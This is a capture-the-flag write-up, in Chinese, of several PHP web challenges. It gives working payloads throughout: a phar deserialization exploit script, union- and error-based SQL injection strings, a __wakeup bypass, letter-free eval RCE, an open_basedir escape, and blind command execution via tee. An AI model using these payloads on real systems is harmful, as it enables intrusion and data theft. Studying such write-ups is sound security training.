babyunser

phar反序列化

利用文件查看器直接读到三个文件

read.php

<?php
include('class.php');
$a=new aa();
?>
error_reporting(0);
$filename=$_POST['file'];
if(!isset($filename)){die();
}
$file=new zz($filename);
$contents=$file->getFile();
?>
<br>
<textarea class="file_content" type="text" value=<?php echo "<br>".$contents;?>

class.php

<?php
class aa{public $name;public function __construct(){$this->name='aa';}public function __destruct(){$this->name=strtolower($this->name);}
}class ff{private $content;public $func;public function __construct(){$this->content="\<?php @eval(\$_POST[1]);?>";}public function __get($key){$this->$key->{$this->func}($_POST['cmd']);}
}class zz{public $filename;public $content='surprise';public function __construct($filename){$this->filename=$filename;}public function filter(){if(preg_match('/^\/|php:|data|zip|\.\.\//i',$this->filename)){die('这不合理');}}public function write($var){$filename=$this->filename;$lt=$this->filename->$var;//此功能废弃，不想写了}public function getFile(){$this->filter();$contents=file_get_contents($this->filename);if(!empty($contents)){return $contents;}else{die("404 not found");}}public function __toString(){$this->{$_POST['method']}($_POST['var']);return $this->content;}
}class xx{public $name;public $arg;public function __construct(){$this->name='eval';$this->arg='phpinfo();';}public function __call($name,$arg){$name($arg[0]);}
}

upload,php

<?phpif(isset($_POST['submit'])){$upload_path="upload/".md5(time()).".txt";$temp_file = $_FILES['upload_file']['tmp_name'];if (move_uploaded_file($temp_file, $upload_path)) {echo "文件路径：".$upload_path;} else {$msg = '上传失败';}}

因为上传的文件会直接被改名且成为txt文件，所以不考虑文件上传绕过rce

pop链条

{aa __strlower} --> {zz __toString  method=wreite,filename->$var} --> {ff __get,$key=$content=xx ,func=assert,} -->  {xx __call, $name=assert,$arg=$_POST}

其中

(解析 phar:// 伪协议时，会将其内容进行反序列化，所以 phar 里面的内容传入恶意 pop 链)

file=phar://...&method=write&var=content&cmd=system('cat /flag');

exp

<?php
class aa{public $name;function __construct(){$this->name = new zz();}
}class zz{public $filename;public $content='surprise';function __construct(){$this->filename = new ff();}}class ff{private $content;public $func = "assert";function __construct(){$this->content = new xx();}
}class xx{public $name;public $arg;
}$a = new aa();
echo urlencode(serialize($a));# 下面这部分就没改
$phar = new Phar("phar.phar");
$phar->startBuffering();
$phar->setStub("<?php __HALT_COMPILER(); ?>"); //设置stub$phar->setMetadata($a); //将自定义的meta-data存入manifest
$phar->addFromString("test.txt", "test"); //添加要压缩的文件
//签名自动计算

==>

POST read.phpfile=phar://upload/f17682891b083ec486fe811956039270.txt&method=write&var=content&cmd=system('cat /flag');

easy_md5

数组绕过

if ($name != $password && md5($name) == md5($password)){echo $flag;}

数组绕过

name[]=1password[]=2

easy_sql

/?wllm=-1' union select 1,2,3--+ 
/?wllm=-1' union select 1,2,database()--+/?wllm=-1' union select 1,2,(select group_concat(table_name)from information_schema.tables where table_schema=database())--+
/?wllm=-1' union select 1,2,(select group_concat(column_name)from information_schema.columns where table_name='test_tb')--+/?wllm=-1' union select 1,2,(select group_concat(flag)from test_tb)--+

no_wakeup

wake up 绕过

 
class HaHaHa{public $admin;public $passwd;public function __construct(){$this->admin ="user";$this->passwd = "123456";}public function __wakeup(){$this->passwd = sha1($this->passwd);}public function __destruct(){if($this->admin === "admin" && $this->passwd === "wllm"){include("flag.php");echo $flag;}else{echo $this->passwd;echo "No wake up";}}}$Letmeseesee = $_GET['p'];
unserialize($Letmeseesee);

O:6:"HaHaHa":2:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}Change toO:6:"HaHaHa":3:{s:5:"admin";s:5:"admin";s:6:"passwd";s:4:"wllm";}

error

报错注入

?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+  
?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1)--+ ?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='test_tb' limit 1,1),0x7e),1)--+ 
这里涉及到flag显示一半的问题
?id=1' and updatexml(1,concat(0x7e,(select flag from test_tb),0x7e),1)--+ 
?id=1' and updatexml(1,concat(0x7e,(select right(flag,30) from test_tb),0x7e),1)--+

hardrce

取反绕过 rce

if(isset($_GET['wllm']))
{$wllm = $_GET['wllm'];$blacklist = [' ','\t','\r','\n','\+','\[','\^','\]','\"','\-','\$','\*','\?','\<','\>','\=','\`',];foreach ($blacklist as $blackitem){if (preg_match('/' . $blackitem . '/m', $wllm)) {die("LTLT说不能用这些奇奇怪怪的符号哦！");}}
if(preg_match('/[a-zA-Z]/is',$wllm))
{die("Ra's Al Ghul说不能用字母哦！");
}
echo "NoVic4说：不错哦小伙子，可你能拿到flag吗？";
eval($wllm);
}

<?php
fwrite(STDOUT,'[+]your function: ');
$system=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
fwrite(STDOUT,'[+]your command: ');
$command=str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
echo '[*] (~'.urlencode(~$system).')(~'.urlencode(~$command).');';

hardrce_3

[参考][https://www.cnblogs.com/pursue-security/p/15404150.html]

自增绕过 rce

if(isset($_GET['wllm']))
{$wllm = $_GET['wllm'];$blacklist = [' ','\^','\~','\|'];foreach ($blacklist as $blackitem){if (preg_match('/' . $blackitem . '/m', $wllm)) {die("小伙子只会异或和取反？不好意思哦LTLT说不能用！！");}}
if(preg_match('/[a-zA-Z0-9]/is',$wllm))
{die("Ra'sAlGhul说用字母数字是没有灵魂的！");
}
echo "NoVic4说：不错哦小伙子，可你能拿到flag吗？";
eval($wllm);
}

//测试发现7.0.12以上版本不可使用
//使用时需要url编码下
$_=[];$_=@"$_";$_=$_['!'=='@'];$___=$_;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$___.=$__;$____='_';$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$__=$_;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$__++;$____.=$__;$_=$$____;$___($_[_]);
固定格式 构造出来的 assert($_POST[_]);
然后post传入   _=phpinfo();

禁用了很多函数，但可以使用 file_put_contents

_=file_put_contents('1.php',"<?php print_r(ini_get('open_basedir').'<br>'); mkdir('test'); chdir('test'); ini_set('open_basedir','..'); chdir('..'); chdir('..'); chdir('..'); ini_set('open_basedir','/'); echo file_get_contents('/flag'); print(1);?> ");

这段代码的目的是尝试绕过服务器的 open_basedir 限制，以读取服务器上的某些文件（如 /flag）。open_basedir 是 PHP 的一个安全设置，用于限制脚本只能访问指定目录内的文件。通过修改 open_basedir 的值并切换目录，代码试图突破这一限制。

<?php
// 获取 open_basedir 的当前值，并输出
print_r(ini_get('open_basedir').'<br>');// 创建一个名为 'test' 的目录
mkdir('test');// 切换到 'test' 目录
chdir('test');// 将 open_basedir 设置为 '..'，即上一级目录
ini_set('open_basedir','..');// 返回上一级目录
chdir('..');// 再次返回上一级目录
chdir('..');// 再次返回上一级目录
chdir('..');// 将 open_basedir 设置为 '/'
ini_set('open_basedir','/');// 读取并输出 '/flag' 文件的内容
echo file_get_contents('/flag');// 输出数字 1
print(1);
?>

no echo rce

无回显 rce

if(isset($_GET['url']))
{$url=$_GET['url'];if(preg_match('/bash|nc|wget|ping|ls|cat|more|less|phpinfo|base64|echo|php|python|mv|cp|la|\-|\*|\"|\>|\<|\%|\$/i',$url)){echo "Sorry,you can't use this.";}else{echo "Can you see anything?";exec($url);}

/?url=tac /flllll\aaaaaaggggggg | tee 2.txt

然后访问 2.txt 即可

这种当然可以尝试反弹 shell

sql

sql fuzz，简单绕过，数据截取

/?wllm=-1'/**/union/**/select/**/1,2,database()%23
/?wllm=-1'/**/union/**/select/**/1,2,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema/**/like/**/database()%23/?wllm=-1'/**/union/**/select/**/1,2,group_concat(flag)/**/from/**/LTLT_flag%23/?wllm=-1'/**/union/**/select/**/1,2,mid(group_concat(flag),20,40)/**/from/**/LTLT_flag%23